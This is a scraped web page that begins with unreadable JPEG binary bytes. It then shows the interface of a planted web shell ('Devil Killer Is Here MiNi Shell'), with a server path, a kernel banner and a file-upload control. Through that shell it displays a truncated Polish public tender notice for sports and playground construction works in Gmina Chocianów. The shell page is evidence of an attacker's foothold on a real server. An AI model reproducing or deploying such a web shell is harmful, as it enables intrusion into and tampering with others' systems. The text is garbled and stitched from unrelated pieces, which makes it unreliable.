JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230210/0009133501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utworzenie miejsc sportu i rekreacji na terenie Gminy Chocianów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Chocianów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647570</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ratuszowa 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chocianów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-140</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bok@chocianow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://chocianow.bip.pbox.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utworzenie miejsc sportu i rekreacji na terenie Gminy Chocianów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a60189e5-a789-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00091335</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00033334/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Utworzenie miejsc sportu i rekreacji na terenie Gminy Chocianów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://chocianow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie<br/>przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną, tj:<br/>1) pocztą elektroniczną na adres e-mail: bok@chocianow.pl lub<br/>2) poprzez Platformę przetargową pod adresem:<br/>https://chocianow.ezamawiajacy.pl (zwanej dalej zamiennie Platformą przetargową), w wierszu oznaczonym tytułem oraz znakiem<br/>niniejszego postępowania.<br/>2. Ofertę składa się pod rygorem nieważności, zgodnie z wyborem Wykonawcy:<br/>1) w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym),<br/>2) w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>- wyłącznie poprzez Platformę przetargową.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 3 ust. 3 ww.<br/>Rozporządzenia określa niezbędne wymagania sprzętowo aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; Komputer klasy PC lub MAC, o<br/>następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os<br/>x 10.4, Linux, lub ich nowsze wersje; Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej<br/>wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>Włączona obsługa JavaScript; Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. Zamawiający<br/>zgodnie z § 3 ust. 3 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt,<br/>rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt,docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a,<br/>mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig,XAdES, CAdES, ASIC, XMLenc.<br/>Zamawiającyzgodnie z § 3 ust. 3 ww. Rozporządzenia określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/>otwarcia ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RU.271.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">11</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.1.	CZĘŚĆ I – Przebudowa budynku przy ul. 3 Maja w Chocianowie pod potrzeby utworzenia Chocianowskiego Centrum Informacji Turystycznej zgodnie z dokumentacją projektową i specyfikacjami wykonania i odbioru robót budowlanych, obejmującą między innymi:<br/>a)	adaptację budynku przy ul. 3 Maja 4 pod potrzeby utworzenia Chocianowskiego Centrum Informacji Turystycznej w tym wykonanie robót rozbiórkowych, przebudowę pomieszczeń, schodów oraz wykonanie innych robót budowlanych w budynku,<br/>b)	wymianę stolarki drzwiowej i okiennej,<br/>c)	wykonanie robót izolacyjnych,<br/>d)	przebudowę wewnętrznych instalacji: elektrycznej, teletechnicznej, domofonowej, wodnej i kanalizacyjnej, wentylacyjnej i ogrzewania budynku, budowę instalacji fotowoltaicznej,<br/>e)	zagospodarowanie terenu przy budynku,<br/>f)	budynek znajduje się w wykazie zabytków dawnego województwa legnickiego – powiat polkowicki – gm. Chocianów, pozycja nr 106, teren znajduje się w strefie „OW” ochrony archeologicznej i strefie „U” ochrony układu przestrzennego miasta.<br/>g)	przed budynkiem od strony ul. Fabrycznej należy ująć montaż dwóch urządzeń siłowni zewnętrznej – rower i wioślarz,<br/>h)	dostawa i montaż monitora (telewizora) z komputerem do wyświetlania informacji turystycznych (dla monitora i komputera należy zapewnić doprowadzenie zasilania elektrycznego). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej dla cz. I-VII Zamawiający będzie się kierował następującymi kryteriami:<br/>a)	cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>b)	okres gwarancji – 30 pkt (waga kryterium wyrażona w punktach)<br/>c)	czas usunięcie usterek w okresie gwarancji – 10 pkt (waga kryterium wyrażona w punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas usunięcie usterek w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II - Przebudowa pomieszczeń w świetlicy wiejskiej w Brunowie z przeznaczeniem na salę do ćwiczeń fitness na działce nr 64/1 w tym:<br/>a)	opracowanie kompletnych wielobranżowych dokumentacji projektowo – kosztorysowych wraz z uzyskaniem wszelkich wymaganych przepisami prawa opinii, uzgodnień, decyzji i pozwoleń w tym pozwolenia na budowę, tj. między innymi: projekty budowlane i wykonawcze, specyfikacje techniczne wykonania i odbioru robót budowlanych,<br/>b)	przed złożeniem wniosku w Administracji Budowlanej Wykonawca musi bezwzględnie uzyskać od Zamawiającego ostateczną akceptacje dokumentacji projektowej, która powinna obejmować: <br/>- remont elewacji budynku, <br/>- przebudowę pomieszczeń w budynku w celu wydzielenia Sali fitness wraz z jej wyposażeniem,<br/>- przebudowę schodów zewnętrznych i wewnętrznych,<br/>- wydzielenie sanitariatów,<br/>- wentylację pomieszczeń. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej dla cz. I-VII Zamawiający będzie się kierował następującymi kryteriami:<br/>a)	cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>b)	okres gwarancji – 30 pkt (waga kryterium wyrażona w punktach)<br/>c)	czas usunięcie usterek w okresie gwarancji – 10 pkt (waga kryterium wyrażona w punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas usunięcie usterek w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.3.	CZĘŚĆ III – Budowa placów zabaw oraz doposażenie istniejących placów zabaw – zakres zadania obejmuje: <br/>a)	opracowanie pełnobranżowych dokumentacji projektowych wraz z uzyskaniem wymaganych prawem opinii, uzgodnień, zgód i pozwoleń w tym pozwolenia na wykonanie robót budowlanych (pozwolenie na budowę , zaświadczenie o niewniesieniu sprzeciwu),<br/>b)	dokumentacje projektowe należy opracować na podstawie dołączonych programów funkcjonalno–użytkowych opracowanych przez JS ARCHITEKCI, ul. Benedyktyńska 15/23-25, 50-350 Wrocław, wszelkie odstępstwa należy bezwzględnie uzgodnić z Zamawiającym,<br/>c)	opracowanie kosztorysów inwestorskich, przedmiarów robót oraz STWiOR,<br/>d)	uzyskanie ostatecznej akceptacji dokumentacji projektowej przez Zamawiającego przed złożeniem wniosku w Administracji Budowlanej,<br/>e)	wykonanie robót budowlanych i montażowych na podstawie uzyskanych pozwoleń na budowę lub zaświadczeń o niewniesieniu sprzeciwu zgodnie z uzgodnioną z Zamawiającym dokumentacją projektową,<br/>f)	dostosowanie obiektów do możliwości korzystania przez osoby niepełnosprawne,<br/>g)	ilość lamp solarnych na placach zabaw oraz nawierzchnię placów zabaw należy przyjąć zgodnie z opisem w SWZ,<br/>h)	zakres przebudowy placu zabaw w Żabicach został opisany jedynie w SWZ, <br/>a dokumenty pomocnicze (mapy, zdjęcia itp. stanową załączniki do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej dla cz. I-VII Zamawiający będzie się kierował następującymi kryteriami:<br/>a)	cena ofertowa – 60 pkt (waga kryterium wyrażona w punktach)<br/>b)	okres gwarancji – 30 pkt (waga kryterium wyrażona w punktach)<br/>c)	czas usunięcie usterek w okresie gwarancji – 10 pkt (waga kryterium wyrażona w punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas usunięcie usterek w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ IV – Budowa placu zabaw oraz strefy seniora w Chocianowie oraz strefy relaksu w Chocianowcu – zakres zadania obejmuje: <br/>a) opracowanie pełnobranżowych dokumentacji projektowych wraz z uzyskaniem wymaganych prawem opinii, uzgodnień, zgód i pozwoleń w tym pozwolenia na wykonanie robót budowlanych (pozwolenie na budowę , zaświadczenie o niewniesieniu sprzeciwu),<br/>b)	dokumentacje projektowe należy opracować na podstawie dołączonych programów funkcjonalno–użytkowych opracowanych przez JS ARCHITEKCI, ul. Benedyktyńska 15/23-25, 50-350 Wrocław, wszelkie odstępstwa należy bezwzględnie uzgodnić z Zamawiającym,<br/>c)	opracowanie kosztorysów inwestorskich, przedmiarów robót oraz STWiOR,<br/>d)	uzyskanie ostatecznej akceptacji dokumentacji projektowej przez Zamawiającego przed złożeniem wniosku w Administracji Budowlanej,<br/>e)	wykonanie robót budowlanych i montażowych na podstawie uzyskanych pozwoleń na budowę lub zaświadczeń o niewniesieniu sprzeciwu zgodnie z uzgodnioną z Zamawiającym dokumentacją projektową,<br/>f)	dostosowanie obiektów do możliwości korzystania przez osoby niepełnosprawne,<br/>g)	ilość lamp solarnych na placu zabaw / strefach seniora i relaksu oraz nawierzchnię placu zabaw należy przyjąć zgodnie z opisem w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) 